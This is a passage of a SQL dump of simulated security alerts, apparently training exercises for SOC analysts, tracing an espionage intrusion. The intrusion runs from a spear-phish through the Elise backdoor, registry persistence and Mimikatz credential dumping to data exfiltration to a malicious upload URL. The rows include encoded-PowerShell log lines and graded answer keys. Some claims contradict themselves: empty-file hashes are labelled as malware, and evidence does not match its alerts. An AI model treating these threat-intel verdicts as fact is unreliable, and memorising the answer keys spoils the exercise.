APT\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1163, 'Data Exfiltration of Sensitive Government Documents', 'critical', 'Data Loss Prevention (DLP) Systems', 'The operation culminated with the exfiltration of sensitive documents from the government network. The attacker used a compromised user account to transfer the files to an external server, marking the completion of the intelligence-gathering mission.', 'Data Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T03:45:27Z\",\"event_id\":\"DLP-EXFIL-2023\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"action\":\"file_transfer\",\"transferred_files\":[{\"filename\":\"classified_documents.zip\",\"hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"size\":\"150MB\"}],\"protocol\":\"HTTPS\",\"status\":\"success\"}', '2026-02-07 21:14:20', '2026-02-16 04:59:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known threat actor APT32\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash matches known exfiltration tool\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"internal\",\"details\":\"Compromised user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.424Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:27Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-2023\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"transferred_files\\\":[{\\\"filename\\\":\\\"classified_documents.zip\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"size\\\":\\\"150MB\\\"}],\\\"protocol\\\":\\\"HTTPS\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.424Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:27Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-2023\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"transferred_files\\\":[{\\\"filename\\\":\\\"classified_documents.zip\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"size\\\":\\\"150MB\\\"}],\\\"protocol\\\":\\\"HTTPS\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.424Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:27Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-2023\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"transferred_files\\\":[{\\\"filename\\\":\\\"classified_documents.zip\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"size\\\":\\\"150MB\\\"}],\\\"protocol\\\":\\\"HTTPS\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.424Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:27Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-2023\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"transferred_files\\\":[{\\\"filename\\\":\\\"classified_documents.zip\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"size\\\":\\\"150MB\\\"}],\\\"protocol\\\":\\\"HTTPS\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.424Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:27Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-2023\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"transferred_files\\\":[{\\\"filename\\\":\\\"classified_documents.zip\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"size\\\":\\\"150MB\\\"}],\\\"protocol\\\":\\\"HTTPS\\\",\\\"status\\\":\\\"success\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1164, 'Spear Phishing Email Detected', 'high', 'Email Gateway Logs', 'A spear-phishing email was detected targeting a high-ranking official in the military department. The email contained a malicious attachment named \'confidential_report.pdf.exe\' intended to deploy the Elise backdoor.', 'Initial Access', 'T1566.001 - Spear Phishing Attachment', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T08:32:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.25\",\"email_subject\":\"Urgent: Confidential Military Report\",\"sender_email\":\"unknown@trustedgov.com\",\"recipient_email\":\"general.johnson@military.gov\",\"attachment_name\":\"confidential_report.pdf.exe\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malware_family\":\"Elise\",\"smtp_server\":\"smtp.trustedgov.com\"}', '2026-02-07 21:21:11', '2026-02-23 17:39:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a well-known variant of the Elise backdoor.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"unknown@trustedgov.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Email domain appears legitimate but sender is not recognized.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_report.pdf.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable disguised as a PDF, installs backdoor.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear Phishing Email Detected\",\"date\":\"2026-02-08T19:00:02.428Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1165, 'Elise Backdoor Activation', 'high', 'Endpoint Detection and Response (EDR) Logs', 'Upon opening the malicious attachment, the Elise backdoor is activated, establishing a covert communication channel with Lotus Blossom\'s command and control servers. This step allows the attackers to execute further malicious actions within the compromised system.', 'Execution', 'T1059.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_id\":\"123456\",\"event_type\":\"process_creation\",\"user\":\"jdoe\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.45\",\"process_name\":\"elise.exe\",\"process_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"command_line\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\elise.exe\",\"parent_process\":\"explorer.exe\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\elise.exe\"}', '2026-02-07 21:21:11', '2026-02-23 17:40:54', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with Lotus Blossom.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Elise backdoor.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"elise.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Threat Database\",\"verdict\":\"malicious\",\"details\":\"Filename commonly used by Elise backdoor.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1166, 'Persistence Mechanism Identified', 'high', 'System Registry Analysis', 'The attackers deploy persistence mechanisms by modifying registry entries, ensuring the Elise backdoor remains active even after system reboots. This step highlights the group\'s tactics in maintaining a foothold within the network.', 'Persistence', 'T1547.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:33:21Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.102\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"registry_value\":\"EliseBackdoor\",\"registry_data\":\"\\\"C:\\\\Program Files\\\\Elise\\\\elise.exe\\\"\",\"hash\":\"1d0f20f1c4c3e5b673d7a9a8b9c9e7f3\",\"username\":\"compromised_user\"}', '2026-02-07 21:21:11', '2026-02-23 17:42:26', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"1d0f20f1c4c3e5b673d7a9a8b9c9e7f3\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Elise backdoor variant.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"User account involved in suspicious activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.434Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:33:21Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.102\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value\\\":\\\"EliseBackdoor\\\",\\\"registry_data\\\":\\\"\\\\\\\"C:\\\\\\\\Program Files\\\\\\\\Elise\\\\\\\\elise.exe\\\\\\\"\\\",\\\"hash\\\":\\\"1d0f20f1c4c3e5b673d7a9a8b9c9e7f3\\\",\\\"username\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.434Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:33:21Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.102\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value\\\":\\\"EliseBackdoor\\\",\\\"registry_data\\\":\\\"\\\\\\\"C:\\\\\\\\Program Files\\\\\\\\Elise\\\\\\\\elise.exe\\\\\\\"\\\",\\\"hash\\\":\\\"1d0f20f1c4c3e5b673d7a9a8b9c9e7f3\\\",\\\"username\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.434Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:33:21Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.102\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value\\\":\\\"EliseBackdoor\\\",\\\"registry_data\\\":\\\"\\\\\\\"C:\\\\\\\\Program Files\\\\\\\\Elise\\\\\\\\elise.exe\\\\\\\"\\\",\\\"hash\\\":\\\"1d0f20f1c4c3e5b673d7a9a8b9c9e7f3\\\",\\\"username\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.434Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:33:21Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.102\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value\\\":\\\"EliseBackdoor\\\",\\\"registry_data\\\":\\\"\\\\\\\"C:\\\\\\\\Program Files\\\\\\\\Elise\\\\\\\\elise.exe\\\\\\\"\\\",\\\"hash\\\":\\\"1d0f20f1c4c3e5b673d7a9a8b9c9e7f3\\\",\\\"username\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.434Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:33:21Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.102\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value\\\":\\\"EliseBackdoor\\\",\\\"registry_data\\\":\\\"\\\\\\\"C:\\\\\\\\Program Files\\\\\\\\Elise\\\\\\\\elise.exe\\\\\\\"\\\",\\\"hash\\\":\\\"1d0f20f1c4c3e5b673d7a9a8b9c9e7f3\\\",\\\"username\\\":\\\"compromised_user\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1167, 'Credential Dumping Activity Detected', 'high', 'Network Traffic Analysis', 'Anomalous network traffic indicative of credential dumping was detected. An unauthorized user is attempting to extract authentication details, likely to facilitate lateral movement within the network.', 'Lateral Movement', 'T1003 Credential Dumping', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:30:00Z\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"10.0.0.21\",\"external_attacker_ip\":\"203.0.113.45\",\"user\":\"compromised_user\",\"action\":\"credential_dump\",\"tool\":\"mimikatz.exe\",\"hash\":\"f2c7e4c8b6a1f4a2b4d6e5a1c3d8f9b0\",\"filename\":\"lsass_dump.dmp\",\"event_description\":\"Credential Dumping detected from 192.168.1.15 using Mimikatz targeting 10.0.0.21.\"}', '2026-02-07 21:21:11', '2026-02-23 17:43:03', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network_scan\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in credential dumping.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.21\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network_scan\",\"verdict\":\"internal\",\"details\":\"Targeted internal IP address for credential dumping.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address associated with APT activities.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"f2c7e4c8b6a1f4a2b4d6e5a1c3d8f9b0\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"MD5 hash of Mimikatz executable used in credential dumping.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"lsass_dump.dmp\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"suspicious\",\"details\":\"Dump file created by Mimikatz tool.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"user_activity_monitoring\",\"verdict\":\"suspicious\",\"details\":\"User account suspected of being compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1168, 'Data Exfiltration Detected', 'high', 'Data Loss Prevention (DLP) Systems', 'The final stage of the operation involves the exfiltration of sensitive documents related to government and military operations. The attackers use encrypted channels to transfer data, concluding their espionage mission. This alert emphasizes the need for robust data protection measures.', 'Exfiltration', 'T1020 - Automated Exfiltration', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-08T14:32:45Z\",\"source_ip\":\"192.168.1.102\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"method\":\"POST\",\"url\":\"https://maliciousdomain.com/upload\",\"username\":\"jdoe\",\"file_exfiltrated\":\"confidential_docs.zip\",\"file_hash\":\"a6b5c18e2d3f4bcd5678efa1b23c4567\",\"session_id\":\"abc123xyz\",\"alert_id\":\"dlp-2023-001\",\"action\":\"blocked\",\"internal\":false}', '2026-02-07 21:21:11', '2026-02-23 17:44:11', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with data exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"https://maliciousdomain.com/upload\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"URL used for uploading exfiltrated data.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_docs.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal database\",\"verdict\":\"suspicious\",\"details\":\"Potentially sensitive file involved in exfiltration.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"a6b5c18e2d3f4bcd5678efa1b23c4567\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash database\",\"verdict\":\"malicious\",\"details\":\"Hash of exfiltrated file associated with known data breaches.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.437Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-08T14:32:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"method\\\":\\\"POST\\\",\\\"url\\\":\\\"https://maliciousdomain.com/upload\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_exfiltrated\\\":\\\"confidential_docs.zip\\\",\\\"file_hash\\\":\\\"a6b5c18e2d3f4bcd5678efa1b23c4567\\\",\\\"session_id\\\":\\\"abc123xyz\\\",\\\"alert_id\\\":\\\"dlp-2023-001\\\",\\\"action\\\":\\\"blocked\\\",\\\"internal\\\":false}\"},{\"timestamp\":\"2026-02-08T18:59:02.437Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-08T14:32:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"method\\\":\\\"POST\\\",\\\"url\\\":\\\"https://maliciousdomain.com/upload\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_exfiltrated\\\":\\\"confidential_docs.zip\\\",\\\"file_hash\\\":\\\"a6b5c18e2d3f4bcd5678efa1b23c4567\\\",\\\"session_id\\\":\\\"abc123xyz\\\",\\\"alert_id\\\":\\\"dlp-2023-001\\\",\\\"action\\\":\\\"blocked\\\",\\\"internal\\\":false}\"},{\"timestamp\":\"2026-02-08T18:58:02.437Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-08T14:32:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"method\\\":\\\"POST\\\",\\\"url\\\":\\\"https://maliciousdomain.com/upload\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_exfiltrated\\\":\\\"confidential_docs.zip\\\",\\\"file_hash\\\":\\\"a6b5c18e2d3f4bcd5678efa1b23c4567\\\",\\\"session_id\\\":\\\"abc123xyz\\\",\\\"alert_id\\\":\\\"dlp-2023-001\\\",\\\"action\\\":\\\"blocked\\\",\\\"internal\\\":false}\"},{\"timestamp\":\"2026-02-08T18:57:02.437Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 